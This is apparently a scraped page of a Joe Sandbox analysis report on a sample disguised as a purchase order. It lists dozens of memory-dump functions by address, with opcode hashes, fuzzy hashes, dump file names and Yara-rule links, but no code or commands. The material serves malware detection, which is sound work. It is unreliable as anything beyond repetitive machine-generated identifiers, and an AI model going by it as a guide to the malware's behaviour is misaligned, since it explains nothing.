Opcode ID: 226c0f27792a3bba9cd4e6523f414799bb7744ca1495ceb0954edc29a87a3985
Instruction ID: 39ab47ae43ec07992693c815952a304d05fc69551e6bf7f7d8d0fec26587c377
Opcode Fuzzy Hash: 226c0f27792a3bba9cd4e6523f414799bb7744ca1495ceb0954edc29a87a3985
Instruction Fuzzy Hash: 6D412230A08295AFDB25CFECC4956BAFBF1FF69300F448489E5C18BA45C335A446DB60

Function 0102A390 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ada36d04f096322e3c82984da5afa9d9fa4ff981bd08b4b5577b956affc28d20
Instruction ID: 92d3c19f63370d8b6d3a916eae6562da62a7cf4f56d27d313b1d6f23ae397833
Opcode Fuzzy Hash: ada36d04f096322e3c82984da5afa9d9fa4ff981bd08b4b5577b956affc28d20
Instruction Fuzzy Hash: B141DF31A00225CFDB21CF68D4857AFBBB4FB58320F04019AE881ABA95DF39D944CB60

Function 00FF88C8 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e14ed878f6f35d21475082b9546404e2589e89cfe517e0c70a5a14f602376625
Instruction ID: 899cb29b1df01b9bebea8ea380136be0af5b5dec35896a9132076bf296366c58
Opcode Fuzzy Hash: e14ed878f6f35d21475082b9546404e2589e89cfe517e0c70a5a14f602376625
Instruction Fuzzy Hash: 664150715083169ED321DF64C880A7BB7E9FF84B54F00092AFA94D7250EB71DE159B93

Function 010008CD Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 867d335fb19390404f149f7e16e5a13b9f53ffdb7947355d6349d226cdb8e416
Instruction ID: f39b0e84cebcbb135e3bb2619331f8e8e1799aa8f7d968a19338323351a5ba52
Opcode Fuzzy Hash: 867d335fb19390404f149f7e16e5a13b9f53ffdb7947355d6349d226cdb8e416
Instruction Fuzzy Hash: 24415971600701EFE362DF28D840B6ABBE4FF55354F24856AF9898B295E734E942CB90

Function 01030630 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 115f0ca1e762c5ca0ab69c633fbfbeca290f491afa8b80bfe5ab1d04bb40af6c
Instruction ID: e1a32b74a7cfeb940c1bd1d0578fb3107803a2f0956a07fb25cb8c1ba544947c
Opcode Fuzzy Hash: 115f0ca1e762c5ca0ab69c633fbfbeca290f491afa8b80bfe5ab1d04bb40af6c
Instruction Fuzzy Hash: 3B415D71A01705EFDB25CF98C990AAABBF8FF88700B20496DE596E7654D730EA44CF50

Function 0108EC20 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0f978527047e61039f48c2dde78eef8df9876136922e3443e8c1a3437232675
Instruction ID: 2d33b0bf2e551ca5e1ffe7ddf47b8846cf0acd2cdcb343f97efa9fa801bf0a5b
Opcode Fuzzy Hash: b0f978527047e61039f48c2dde78eef8df9876136922e3443e8c1a3437232675
Instruction Fuzzy Hash: 4941A471F002199BCF18EFBDC8805AEF7F2FF88310B188279D695E7295D63499458B80

Function 0103C819 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 223182ea10a65bae2bfc9e25c5e27e89a7ffcba035cc775b5ea839cac7fe6a39
Instruction ID: d02a39a1956f359d300f04a12cf9be64f81b916dbe90388665b664d54d026eeb
Opcode Fuzzy Hash: 223182ea10a65bae2bfc9e25c5e27e89a7ffcba035cc775b5ea839cac7fe6a39
Instruction Fuzzy Hash: ED3177B2A00745DFEB52CFA8C540799BBF4FB49724F2085AED149EB251D3369A02CB94

Function 010CEA5B Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa9d740cad8e4a06672c453c002eccd744da72200226612dce7dab42b32bf178
Instruction ID: 618a7faea261313993ba14f4d719985b90ab48dd8eb35ed860b81fb5c153603c
Opcode Fuzzy Hash: fa9d740cad8e4a06672c453c002eccd744da72200226612dce7dab42b32bf178
Instruction Fuzzy Hash: 90419133A0002A9BCB18CF68D4915BEB7F1FF48704B5A41BDD946EB295DB74AE05CB90

Function 010CF5C9 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68bf817427fbb0674cf75cd62f97f0a9b7c2ae4abd96e5b80573ead4fe31d8ca
Instruction ID: 1aaaf6c1a0b39f1bff926fac765d8bf2e496c48ca04d13829f190cd921edf76f
Opcode Fuzzy Hash: 68bf817427fbb0674cf75cd62f97f0a9b7c2ae4abd96e5b80573ead4fe31d8ca
Instruction Fuzzy Hash: A73113327141039BD318CF38CC44AAB7B97EF98B10B05856CE998CB295EA74D945CB91

Function 010D29CF Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 964b431755c31cf60f3e7e272b63c36df6a51c7b6807d6792e3bb1ab7187f77e
Instruction ID: 04cd8f48f24ba8da48da7851ecb6b4a62fba3f1d0d73b3a444696e63d2dde06b
Opcode Fuzzy Hash: 964b431755c31cf60f3e7e272b63c36df6a51c7b6807d6792e3bb1ab7187f77e
Instruction Fuzzy Hash: DD419372A0020AEFDB15CF9CC9C0A9EBBB5FF84754F148069E545AB341E731EA41CB90

Function 01080227 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0623c1726ee87c199bb8e3b3dcaa987aa8841cad5a60a611c6cdbec700b43d7
Instruction ID: 2764f5a1aab09fca036a200c2c97dfae6f13ba82e87fc7685a9e447cea823221
Opcode Fuzzy Hash: c0623c1726ee87c199bb8e3b3dcaa987aa8841cad5a60a611c6cdbec700b43d7
Instruction Fuzzy Hash: DF4182726096429FD320EF68D890BABB7E9BF88700F044669F9D4C7694E734D904C7A5

Function 00EBE57B Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426113758.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1942e89023351be505cda6d9563f7b782ae1181cd0646b7091492ee58bd56df2
Instruction ID: c58dd8796be740c9c10ee196713c55f397381da3ba118c68672983ced4776403
Opcode Fuzzy Hash: 1942e89023351be505cda6d9563f7b782ae1181cd0646b7091492ee58bd56df2
Instruction Fuzzy Hash: 8A21DA3272454547D72C886CA8A12FB22C7E3CD309B34A63DE69BC77C2E924DD179684

Function 010CF6F6 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8294a53f77c3f866f298ab007af6760589d64708c978e42f0f1344a91aa35ea
Instruction ID: 830b19615f8258ca0983c5bc8f292b0f9ba79b70bdf6a9b9208fa150c45f374d
Opcode Fuzzy Hash: a8294a53f77c3f866f298ab007af6760589d64708c978e42f0f1344a91aa35ea
Instruction Fuzzy Hash: 4431E131610106ABE714CF29CC45AAFBFE6FF98B50F11826CF588CB245DA75E901CB91

Function 00C2E513 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.22425875607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.22426016644.0000000000C67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_PO_62401394_MITech_20250601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction ID: 38c516f3ad17fec80b5d28bad246bc64e884666aefefcc075a94b6f956b54e52
Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction Fuzzy Hash: 0831601165C6F14ED31E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C4888408D3A5

Function 00C2E512 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.22425875607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.22426016644.0000000000C67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_PO_62401394_MITech_20250601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5983a7f4e4c1878e0c2e9d40b19276ebd15838db075785aee2f3b7bf3b957f3
Instruction ID: efe452ec2b910758608f06f3d8e2cf4bdb63834c5d7005acaaf2cb1314d41eef
Opcode Fuzzy Hash: f5983a7f4e4c1878e0c2e9d40b19276ebd15838db075785aee2f3b7bf3b957f3
Instruction Fuzzy Hash: 023180126597F14ED30E836D48B9A75AEC18E5720174EC2FEDADA6F2F3C4888408D3A5

Function 00FFEDFA Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad2aa0c932576436cddb349148d6537386b32a5b4096d7581ddd1ac79c29475d
Instruction ID: 360d2a0cb76fc998311d8485c0428ae5a8f6c591a7cf27a02621dacfc43d36d3
Opcode Fuzzy Hash: ad2aa0c932576436cddb349148d6537386b32a5b4096d7581ddd1ac79c29475d
Instruction Fuzzy Hash: 5741E131A04789CFEB62CBA8C4003EFBBE2BF55314F14496ED5CAA7291C7749805D759

Function 01004180 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c1ae321914af08ad6033698c18333c420bc434859a4d76831c5feb16749a8d3
Instruction ID: 9da14dc4777b0d8093aae57ad4120d38c116586220a12ccd702440afce907605
Opcode Fuzzy Hash: 7c1ae321914af08ad6033698c18333c420bc434859a4d76831c5feb16749a8d3
Instruction Fuzzy Hash: BE41BF312407419FE722DF28C484BDA7BE9AB58314F058469F6998B291D775E840CB50

Function 010266E0 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
Instruction ID: 905473be999d736769c802c73ce41886cd84d813b03c018c6276659e0194fa8f
Opcode Fuzzy Hash: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
Instruction Fuzzy Hash: 1B418E72100A56DFD732DF58CA44FAA7BA9FB44B10F008569E9C98F6A0DB35E901DB90

Function 010A0980 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ea4bc05c1ee0cdf447a732131759216915923e3de71bbe8f1ea3a420c86af98
Instruction ID: e58fcbcf5fe394fcdaf07ad428bbd7cb89ec6033cc047ec30acb28d6b90571c7
Opcode Fuzzy Hash: 1ea4bc05c1ee0cdf447a732131759216915923e3de71bbe8f1ea3a420c86af98
Instruction Fuzzy Hash: 0B31F272104246AFD316DA58CC51EABBBE8EB90660F44866DF9D4CB250E730ED04CBA2

Function 00C23210 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.22425875607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.22426016644.0000000000C67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_PO_62401394_MITech_20250601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97a59df67cc2f7641ad9dc4eb860f96186d1db6c80b4b652b300bbffa6106f61
Instruction ID: a34fde145f25c19eff6b953c93e7bd01dc77a25b7ba632aea4ee20978f70958e
Opcode Fuzzy Hash: 97a59df67cc2f7641ad9dc4eb860f96186d1db6c80b4b652b300bbffa6106f61
Instruction Fuzzy Hash: 7631D3B3A14A249FE368CB6AE941617B7E4FB88310B41862EDA49D3A40D778F900C790

Function 0107E79D Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66e5bfcba95588ad1a05c08785cc3faebc81dcefda74554e72651299aa129877
Instruction ID: 6dade532070819d33ed53427077bc5bc67e4ddf8752c7c93492d62ee864e4521
Opcode Fuzzy Hash: 66e5bfcba95588ad1a05c08785cc3faebc81dcefda74554e72651299aa129877
Instruction Fuzzy Hash: B631E831B426819BF366976DCD48B65BBD8BB40B44F2904F4AAC89F6D1D768D840C228

Function 010A43BA Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd43800d02d1c565601870d588b52f767201a2a9db2886331040425452b890d0
Instruction ID: c86ebec60cee040b2a72e81d952620e6d84599a3b9f141f218281bf658cce1bb
Opcode Fuzzy Hash: cd43800d02d1c565601870d588b52f767201a2a9db2886331040425452b890d0
Instruction Fuzzy Hash: 6E317576A4012DABCB61DF94DC84BDEBBFAAB98310F1441E5A548E7250CA70DE418F90

Function 010C6757 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e8c33e0b3f521d2198a24e9893e8189c2d888e16a55cb8b22e168d52c421d77
Instruction ID: 1873eb695f98de92e27f86a51a2b5e120e1bc9263c3284bf8200687c99d9efed
Opcode Fuzzy Hash: 6e8c33e0b3f521d2198a24e9893e8189c2d888e16a55cb8b22e168d52c421d77
Instruction Fuzzy Hash: 4E31AF716002049BCB24CF69D8C5A5B7BE4FF48700F4185A9F948DF28AD271E919CBA0

Function 0102EA40 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6189a31c76e4642644328d851969ead308b08b1b74ad719316f6dedd60e6383c
Instruction ID: 947f91feb3fc6cd24c72ac563e2b39c5a2fd72a97238903ea25d0084b8656ef9
Opcode Fuzzy Hash: 6189a31c76e4642644328d851969ead308b08b1b74ad719316f6dedd60e6383c
Instruction Fuzzy Hash: 12319572E41225AFDB21DFE9C840AAEBBF8FB44750F114479E995D7250D674EE008B90

Function 010006CF Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fee8093f86406b488b871c1fe7d62eeeb3ddde0cd46dc1a299237caead09e46
Instruction ID: cb237a4712d55480e14da6541beb3f59244af795e173b483c436e1ee96ba5fe2
Opcode Fuzzy Hash: 1fee8093f86406b488b871c1fe7d62eeeb3ddde0cd46dc1a299237caead09e46
Instruction Fuzzy Hash: A731E436A047029BD723DE28C880FABB7E5BF84690F014428FDC997295EB34DC018BA1

Function 01008470 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5334be2d76a23a290ec19827c6ac5df214fc30750b113a08b2d0987bcd929660
Instruction ID: b2f8eef209377e222866aba9b80c9b20964bfaee3ead99501f5068210fd8ccb8
Opcode Fuzzy Hash: 5334be2d76a23a290ec19827c6ac5df214fc30750b113a08b2d0987bcd929660
Instruction Fuzzy Hash: F3315071A053518FE7A1CF19C800B2AB7E9FB88700F0549AEE9C897391DB74E944CB91

Function 00C4F163 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.22425875607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.22426016644.0000000000C67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_PO_62401394_MITech_20250601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abc81de13143524563d9855335c4cb83817440011bd93c020e9597375ecbd476
Instruction ID: ff16bfe36324236eb498d1072009e2bd47788314c25f6f93afd2c01da3fc1e06
Opcode Fuzzy Hash: abc81de13143524563d9855335c4cb83817440011bd93c020e9597375ecbd476
Instruction Fuzzy Hash: 1C31C172B10A269BD354CE3AD88065AF7E1FB88310B548639D929C3B40E774F962CBD0

Function 0103A5E7 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 241b8a829ca63ffa8a9ef5e05c64435535f197a1a802660e6b21c643b4a54232
Instruction ID: 32d508cacf403eada467b2da3840428064371f1a63f49dfe28e177e9f8a9987c
Opcode Fuzzy Hash: 241b8a829ca63ffa8a9ef5e05c64435535f197a1a802660e6b21c643b4a54232
Instruction Fuzzy Hash: 5C3129B2B00B01EFE765CF69DD44B57BBECBB8DA50F04096DA5DAC3650E630E8009B64

Function 010242AF Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5b06dcd12666123db064396ec3b2559df98a9447003c05e4c68f0a19b4a5f5e
Instruction ID: ff92f5004a6ac503fe34b3246694e5c0293123bf48651937157164bdb0acb499
Opcode Fuzzy Hash: a5b06dcd12666123db064396ec3b2559df98a9447003c05e4c68f0a19b4a5f5e
Instruction Fuzzy Hash: CC31E372B006159FD720EFA8C981AAEBBFAFB54308F008529D6C6D7654E731E941CB90

Function 00FFCB1E Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75f7356f376b215d1c8e41e0ee5735b406fecc07d4fc25f329d1287a1e184bf5
Instruction ID: b0ab7146762fca6e5b5a592568a18eb4368338153c17bc664c5cc0c4f9c962e7
Opcode Fuzzy Hash: 75f7356f376b215d1c8e41e0ee5735b406fecc07d4fc25f329d1287a1e184bf5
Instruction Fuzzy Hash: C0212536F0025AAADB109FA88801BBFBBB5AF55790F0585759F55E7340E230C900C7E0

Function 00FFC0F6 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

